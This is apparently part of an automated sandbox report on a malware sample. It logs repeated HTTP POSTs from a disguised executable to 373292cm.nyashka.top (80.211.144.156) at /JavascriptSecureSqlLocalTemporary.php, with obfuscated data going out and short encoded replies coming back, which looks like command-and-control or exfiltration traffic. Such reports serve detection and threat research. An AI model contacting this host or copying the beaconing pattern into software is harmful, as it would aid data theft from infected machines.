                                    Data Ascii: ZR\QTITY[_ZQYPXWW]][WQS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q./,#- 5\*0?*+' <?#1(**'#1_8&F$.Y/
                                    Aug 25, 2024 15:46:36.029711962 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:36.231978893 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    62192.168.2.84977580.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:36.354325056 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:36.704216003 CEST2544OUTData Raw: 5f 50 59 57 51 45 54 59 5b 5f 5a 51 59 55 58 5f 57 5d 5d 58 57 5d 53 54 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _PYWQETY[_ZQYUX_W]]XW]STYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/'6.8^#0\)<\?%(;X <7W#W8S(#\;&F$.Y/-
                                    Aug 25, 2024 15:46:37.019953012 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:37.150091887 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:36 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    63192.168.2.84977680.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:37.277791023 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    64192.168.2.84977780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:37.644320965 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:37.995929003 CEST1840OUTData Raw: 5f 54 5c 57 51 40 54 59 5b 5f 5a 51 59 5e 58 57 57 50 5d 5d 57 5f 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _T\WQ@TY[_ZQY^XWWP]]W_S]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.83$6?#1])>0\?.5+-",#!1/+9_ 0,&F$.Y/
                                    Aug 25, 2024 15:46:38.317540884 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:38.451833963 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 57 29 1b 22 5d 32 2b 20 19 30 23 32 1f 29 03 2f 5a 29 04 29 1a 25 28 2d 5f 26 2d 2c 50 30 3b 21 1f 2b 07 26 50 32 59 20 02 2e 0e 2b 5d 0c 13 22 1b 37 04 2a 10 25 02 28 5c 3e 2b 2c 05 21 2c 2d 03 28 2a 07 19 3e 3c 2f 01 2b 39 0a 03 28 04 2a 53 38 06 2d 5a 39 0e 00 51 34 14 2b 52 0d 11 27 0c 2b 3e 21 1e 2a 07 27 59 22 06 33 5b 27 03 2a 1c 24 22 26 53 30 5f 38 10 25 54 21 54 24 21 2d 1c 26 15 0f 03 26 2f 35 1f 21 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &W)"]2+ 0#2)/Z))%(-_&-,P0;!+&P2Y .+]"7*%(\>+,!,-(*></+9(*S8-Z9Q4+R'+>!*'Y"3['*$"&S0_8%T!T$!-&&/5!"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    65192.168.2.84977880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:37.766120911 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:38.120832920 CEST2544OUTData Raw: 5a 52 5c 51 51 43 54 5d 5b 5f 5a 51 59 51 58 55 57 5b 5d 53 57 5a 53 5f 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZR\QQCT][_ZQYQXUW[]SWZS_YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.,3C" Y4)>3++>(7<71?()?Y" /&F$.Y/=
                                    Aug 25, 2024 15:46:38.439027071 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:38.638863087 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    66192.168.2.84977980.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:38.776668072 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:39.121088028 CEST2544OUTData Raw: 5a 51 5c 57 54 40 54 5e 5b 5f 5a 51 59 51 58 5f 57 5a 5d 5a 57 59 53 5f 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\WT@T^[_ZQYQX_WZ]ZWYS_YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,#"= 4%)>7?-=_+; 441'()# #)\8&F$.Y/=
                                    Aug 25, 2024 15:46:39.481192112 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:39.681713104 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    67192.168.2.84978080.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:39.821790934 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2532
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:40.168323040 CEST2532OUTData Raw: 5f 53 5c 55 54 46 54 59 5b 5f 5a 51 59 57 58 57 57 5a 5d 52 57 51 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\UTFTY[_ZQYWXWWZ]RWQSYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X;3!3 )-,(=!])-< 7P4!$(3\# \,&F$.Y/)
                                    Aug 25, 2024 15:46:40.490339041 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:40.618865967 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    68192.168.2.84978180.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:40.752341032 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:41.105326891 CEST2544OUTData Raw: 5a 50 5c 50 54 48 54 5e 5b 5f 5a 51 59 54 58 5e 57 58 5d 5d 57 5a 53 58 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZP\PTHT^[_ZQYTX^WX]]WZSXYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/D!#0%]* +><-7,#W (+ V";&F$.Y/)
                                    Aug 25, 2024 15:46:41.427051067 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:41.630727053 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    69192.168.2.84978280.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:41.763760090 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:42.120860100 CEST2544OUTData Raw: 5f 56 5c 5f 54 40 51 59 5b 5f 5a 51 59 5e 58 53 57 58 5d 5f 57 5c 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\_T@QY[_ZQY^XSWX]_W\SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.8U0#=7 )-Y+->(\ Z #!0W();4=Y.>&F$.Y/
                                    Aug 25, 2024 15:46:42.464909077 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:42.577907085 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    70192.168.2.84978380.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:42.822948933 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:43.167788982 CEST2544OUTData Raw: 5f 56 59 53 51 40 54 59 5b 5f 5a 51 59 55 58 5e 57 5b 5d 5c 57 51 53 5f 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _VYSQ@TY[_ZQYUX^W[]\WQS_YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X;3!(\"#=Y)$\<->)-[##,V*)8 *;.&F$.Y/-


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    71192.168.2.84978480.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:43.470828056 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:43.823993921 CEST1860OUTData Raw: 5f 5c 59 52 54 48 51 5e 5b 5f 5a 51 59 53 58 5e 57 5c 5d 5b 57 50 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _\YRTHQ^[_ZQYSX^W\][WPS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q./0#B"47#5)[<]<-++7??V#W,<9 =8&F$.Y/5
                                    Aug 25, 2024 15:46:44.151699066 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:44.287707090 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 1c 3e 25 25 01 27 3b 28 19 25 23 2e 52 3e 3e 2b 5e 3d 13 07 1a 24 38 0f 5e 31 07 24 1d 26 38 22 05 28 10 2a 14 26 06 38 03 2c 34 2b 5d 0c 13 22 5f 20 5c 36 5a 26 3f 3f 01 2a 28 23 5e 22 3f 29 01 3f 3a 07 51 28 3c 20 1d 3f 2a 20 00 3c 14 25 0d 38 3b 25 5e 2d 1e 29 0d 34 04 2b 52 0d 11 24 53 2b 3d 39 53 3d 00 11 59 35 5e 2f 12 27 2e 32 55 26 1c 03 0e 26 29 28 5d 32 21 29 1d 33 1f 22 0e 32 05 3e 5a 32 3f 3a 09 22 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &>%%';(%#.R>>+^=$8^1$&8"(*&8,4+]"_ \6Z&??*(#^"?)?:Q(< ?* <%8;%^-)4+R$S+=9S=Y5^/'.2U&&)(]2!)3"2>Z2?:"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    72192.168.2.84978580.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:43.589890003 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:43.949223995 CEST2544OUTData Raw: 5f 5d 5c 55 54 43 51 5a 5b 5f 5a 51 59 54 58 53 57 50 5d 5a 57 5e 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]\UTCQZ[_ZQYTXSWP]ZW^S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X.##!# %X)=4_+>]+['X#<771?<94*,&F$.Y/)
                                    Aug 25, 2024 15:46:44.253233910 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:44.456104040 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    73192.168.2.84978680.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:44.573406935 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:44.928819895 CEST2544OUTData Raw: 5f 53 59 50 54 46 51 5d 5b 5f 5a 51 59 55 58 5f 57 50 5d 5b 57 5c 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _SYPTFQ][_ZQYUX_WP][W\S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-;#?C"=\409X)(]+6(=4"</S 20(*(4V)X,&F$.Y/-
                                    Aug 25, 2024 15:46:45.258770943 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:45.454329014 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    74192.168.2.84978780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:45.609313965 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:45.964991093 CEST2544OUTData Raw: 5f 50 59 57 54 40 54 5d 5b 5f 5a 51 59 53 58 57 57 5b 5d 52 57 5e 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _PYWT@T][_ZQYSXWW[]RW^SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,#?D!-8^#0%Z*/<X*(?[ 3P#! R?<"0)8>&F$.Y/5
                                    Aug 25, 2024 15:46:46.283670902 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:46.415956020 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    75192.168.2.84978880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:46.544878006 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:46.902261019 CEST2544OUTData Raw: 5f 50 59 55 51 43 54 50 5b 5f 5a 51 59 50 58 54 57 5f 5d 5a 57 59 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _PYUQCTP[_ZQYPXTW_]ZWYS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-8U'!0\73!Z+=Y+6?;4Z?V!"$P<0"#%..&F$.Y/
